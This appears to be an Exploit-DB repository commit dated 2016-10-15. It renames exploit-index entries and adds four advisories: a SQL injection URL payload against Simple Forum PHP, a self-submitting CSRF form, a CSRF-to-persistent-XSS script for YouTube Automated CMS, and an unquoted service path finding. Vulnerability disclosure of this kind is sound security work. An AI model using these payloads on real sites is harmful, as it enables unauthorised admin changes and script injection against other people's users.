DB: 2016-10-15

4 new exploits

Open-Xchange App Suite 7.8.2 - Cross Site Scripting
Open-Xchange App Suite 7.8.2 - Cross-Site Scripting

Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting
Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting

Vifi Radio v1 - Cross-Site Request Forgery
Vifi Radio 1.0 - Cross-Site Request Forgery

b374k Web Shell - Cross-Site Request Forgery / Command Injection
b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection

PHP Press Release - Stored Cross Site Scripting
PHP Press Release - Persistent Cross-Site Scripting

ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting
ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting
ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
OpenCimetiere v3.0.0-a5 - Blind SQL Injection
ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting
OpenCimetiere 3.0.0-a5 - Blind SQL Injection

Colorful Blog - Stored Cross Site Scripting
Colorful Blog - Persistent Cross-Site Scripting
Simple Forum PHP 2.4 - SQL Injection
Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

files.csv

@@ -25513,7 +25513,7 @@ id,file,description,date,author,platform,type,port
 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
 28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0
 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
-40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
+40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
 28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
 28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
@@ -25625,7 +25625,7 @@ id,file,description,date,author,platform,type,port
 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
 28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - open_tickets.php ticket_id Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
 28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
-40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
+40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
 28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0
 28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
 28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
@@ -34319,7 +34319,7 @@ id,file,description,date,author,platform,type,port
 37889,platforms/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",linux,remote,0
 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0
 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
-37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80
+37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80
 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21
 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0
@@ -35053,7 +35053,7 @@ id,file,description,date,author,platform,type,port
 38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0
 38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer - Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0
 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
-38688,platforms/php/webapps/38688.txt,"b374k Web Shell - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
+38688,platforms/php/webapps/38688.txt,"b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
 38689,platforms/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0
 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps,0
 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0
@@ -36607,7 +36607,7 @@ id,file,description,date,author,platform,type,port
 40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
-40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
+40487,platforms/php/webapps/40487.txt,"PHP Press Release - Persistent Cross-Site Scripting",2016-10-09,Besim,php,webapps,0
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
 40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
@@ -36623,7 +36623,7 @@ id,file,description,date,author,platform,type,port
 40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
 40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
-40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0
+40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting",2016-10-11,Besim,php,webapps,0
 40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
 40507,platforms/linux/remote/40507.py,"Subversion 1.6.6 / 1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0
 40508,platforms/windows/dos/40508.txt,"Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption",2016-10-12,COSIG,windows,dos,0
@@ -36631,15 +36631,19 @@ id,file,description,date,author,platform,type,port
 40510,platforms/multiple/dos/40510.txt,"Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption",2016-10-12,COSIG,multiple,dos,0
 40511,platforms/php/webapps/40511.txt,"Categorizator 0.3.1 - SQL Injection",2016-10-12,Wadeek,php,webapps,0
 40512,platforms/php/webapps/40512.txt,"NetBilletterie 2.8 - Multiple Vulnerabilities",2016-10-12,Wadeek,php,webapps,0
-40516,platforms/php/webapps/40516.txt,"ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting",2016-10-12,Besim,php,webapps,0
+40516,platforms/php/webapps/40516.txt,"ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting",2016-10-12,Besim,php,webapps,0
-40513,platforms/php/webapps/40513.txt,"OpenCimetiere v3.0.0-a5 - Blind SQL Injection",2016-10-12,Wadeek,php,webapps,0
+40513,platforms/php/webapps/40513.txt,"OpenCimetiere 3.0.0-a5 - Blind SQL Injection",2016-10-12,Wadeek,php,webapps,0
 40515,platforms/android/dos/40515.txt,"Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos,0
 40517,platforms/php/webapps/40517.html,"ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)",2016-10-12,Besim,php,webapps,0
 40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
 40524,platforms/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",osx,dos,0
 40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
-40526,platforms/php/webapps/40526.txt,"Colorful Blog - Stored Cross Site Scripting",2016-10-13,Besim,php,webapps,0
+40526,platforms/php/webapps/40526.txt,"Colorful Blog - Persistent Cross-Site Scripting",2016-10-13,Besim,php,webapps,0
 40527,platforms/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,php,webapps,0
 40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
 40529,platforms/php/webapps/40529.txt,"RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass",2016-10-13,"Arbin Godar",php,webapps,0
 40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0
+40531,platforms/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps,0
+40532,platforms/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps,0
+40533,platforms/windows/local/40533.txt,"NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0
+40534,platforms/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps,0

platforms/php/webapps/40531.txt

@@ -0,0 +1,30 @@
+=====================================================
+# Simple Forum PHP 2.4 - SQL Injection
+=====================================================
+# Vendor Homepage: http://simpleforumphp.com
+# Date: 14 Oct 2016
+# Demo Link : http://simpleforumphp.com/forum/admin.php
+# Version : 2.4
+# Platform : WebApp - PHP
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+=====================================================
+# PoC:
+Vulnerable Url:
+http://localhost/forum/admin.php?act=replies&topic_id=[payload]
+http://localhost/forum/admin.php?act=editTopic&id=[payload]
+Vulnerable parameter : topic_id , id
+Mehod : GET
+
+A simple inject :
+Payload : '+order+by+100--+
+http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
+
+In response can see result :
+Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
+id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'
+
+Result of payload: Error: Unknown column '100' in 'order clause'
+=====================================================
+# Discovered By : Ehsan Hosseini
+=====================================================

platforms/php/webapps/40532.html

@@ -0,0 +1,39 @@
+<!--
+=====================================================
+# Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
+=====================================================
+# Vendor Homepage: http://simpleforumphp.com
+# Date: 14 Oct 2016
+# Demo Link : http://simpleforumphp.com/forum/admin.php
+# Version : 2.4
+# Platform : WebApp - PHP
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+=====================================================
+# Exploit:
+-->
+<html>
+  <!-- CSRF PoC -->
+  <body>
+    <form action="http://localhost/blog/admin.php" method="POST">
+      <input type="hidden" name="act" value="addPost" />
+	  <input type="hidden" name="act" value="updateOptionsAdmin" />
+	  <input type="hidden" name="email" value="attacker@mail.com" />
+	  <input type="hidden" name="captcha" value="nocap" /> <!--Set No
+Captcha(unsecured)-->
+	  <input type="hidden" name="captcha_theme" value="White theme" />
+	  <input type="hidden" name="items_link"
+value="http://localhost/demo_forum.php" />
+	  <input type="hidden" name="time_zone" value="" />
+      <input type="submit" value="Submit request" />
+	  </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+  </body>
+</html>
+<!--
+=====================================================
+# Discovered By : Ehsan Hosseini
+=====================================================
+-->

platforms/php/webapps/40534.html

@@ -0,0 +1,98 @@
+# Exploit Title: YouTube Automated CMS 1.0.1 / 1.0.7 - CSRF to Persistent XSS
+# Date: 14 October 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Software Link: https://codecanyon.net/item/youtube-automated-cms/12021939
+# Version: 1.0.1 to 1.0.7
+
+----------------------------------------------------------------------------------------------------------------------
+
+Description:
+An Attackers are able to execute js and perform CSRF on web
+application using YouTube Automated CMS which allow an attacker to
+create a post when an authenticated user/admin browses a special
+crafted web page. All the process was also possible without any
+authenticated user/admin for more info watch the below PoC Video.
+
+The title parameter was not filtering special characters mean
+vulnerable to XSS. So, now by creating CSRF exploit code for posting
+an article with XSS alert JS payload as title of post. Now if the
+attacker is able to perform CSRF attack sucessfully then XSS will be
+triggered when someone opens the site using YouTube Automated CMS.
+
+CSRF Exploit Code: 
+
+<html>
+  <body>
+   <title>[Youtube Automated CMS] CSRF to Persistent XSS</title>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
+        xhr.withCredentials = true;
+        var body = "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"title\"\r\n" + 
+          "\r\n" + 
+          "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"details\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"category_id\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"published\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"duration\"\r\n" + 
+          "\r\n" + 
+          "70\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"image\"\r\n" + 
+          "\r\n" + 
+          "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" + 
+          "-----------------------------1681718590736\r\n" + 
+          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------1681718590736--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <br><br><br>
+    <center>
+    <h2><font color="red">[Youtube Automated CMS] CSRF to Persistent XSS by Arbin</font></h2>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </center>
+  </body>
+</html>
+
+PoC Video: https://youtu.be/cCtThSquNSk
+
+Vendor Shouted Urgent Update:
+http://wpsup.com/products/youtube-automated-cms/urgent-update-1-0-8-fix-security-bugs/
+
+Fix/Patch: Update to latest version.
+
+----------------------------------------------------------------------------------------------------------------------
+
+Regards,
+Arbin Godar
+https://twitter.com/arbingodar

platforms/windows/local/40533.txt

@@ -0,0 +1,34 @@
+=====================================================
+# NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
+=====================================================
+# Vendor Homepage: http://noip.com
+# Date: 14 Oct 2016
+# Software Link : http://www.noip.com/client/DUCSetup_v4_1_1.exe
+# Version : 4.1.1
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+=====================================================
+# Description:
+NO-IP DUC v4.1.1 installs as a service with an unquoted service path with name NoIPDUCService4.
+
+# PoC:
+Service name : NoIPDUCService4
+
+C:\>sc qc NoIPDUCService4
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: NoIPDUCService4
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START  (DELAYED)
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\No-IP\ducservice.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : NO-IP DUC v4.1.1
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+		
+
+=====================================================
+# Discovered By : Ehsan Hosseini
+=====================================================